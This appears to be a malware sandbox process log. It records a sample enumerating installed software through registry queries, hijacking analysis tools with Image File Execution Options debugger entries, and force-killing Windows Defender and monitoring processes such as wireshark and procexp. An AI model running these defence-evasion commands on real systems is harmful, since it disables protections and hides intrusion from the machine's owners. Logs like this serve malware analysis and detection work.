C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2008
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1628
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1172
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:784
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:568
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1548
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:1216
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:572
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:272
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:308
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:756
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1020
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1944
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:1920
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:1964
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1664
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:1864
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1600
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1580
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:592
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:1904
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1660
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:1972
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1788
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:1776
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:812
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1652
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:360
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1968
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:676
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:584
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:588
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1496
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1872
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:1912
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:2020
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:592
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:1552
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:1784
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1924
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:1844
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:1628
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1968
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:276
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:1084
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:272
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2008
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:1672
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:1608
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:756
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵PID:924
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:1572
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:868
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:1584
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:308
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:556
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:1892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:1600
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1644
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1552
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵PID:1456
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:1128
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1776
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:816
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2036
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:280
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:1880
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1952
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:1664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:1964
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:472
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:1944
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:1672
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1956
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1864
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:628
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:1440
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:924
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:1676
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:1576
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1584
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:1804
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1892
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:636
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:1888
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:1128
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1344
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:1172
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1784
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1852
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:1644
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:812
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1872
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:1916
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:556
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1968
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1352
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:1496
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1084
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:1404
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:1060
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1984
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:1580
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:1572
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1772
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1996
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:1912
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:1168
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1412
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:1400
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2040
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:1880
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:1940
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1920
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:1472
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:1640
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1476
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:1784
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:1788
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1856
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:1552
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:676
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:572
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1596
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:1564
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1652
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:1948
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:2028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:584
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:1796
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2044
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:784
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:1708
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1184
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:1676
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:1572
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2000
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:2020
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:2012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:308
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:1912
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:864
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1172
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:1400
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:1664
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:812
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1020
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:1924
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:2008
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1552
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:1352
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:1596
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:628
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:1060
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:2028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1900
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:1180
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:360
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:784
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:1956
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1972
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1572
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:1904
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:1772
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1168
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:1912
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:1132
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1880
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:756
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:1876
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1364
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:1864
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:1036
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1968
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:692
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:1872
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1944
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:1920
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:1452
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2040
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:1908
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:584
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2004
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:308
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:1468
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:572
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:1888
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:556
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2008
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:1952
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:1940
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1932
-
-
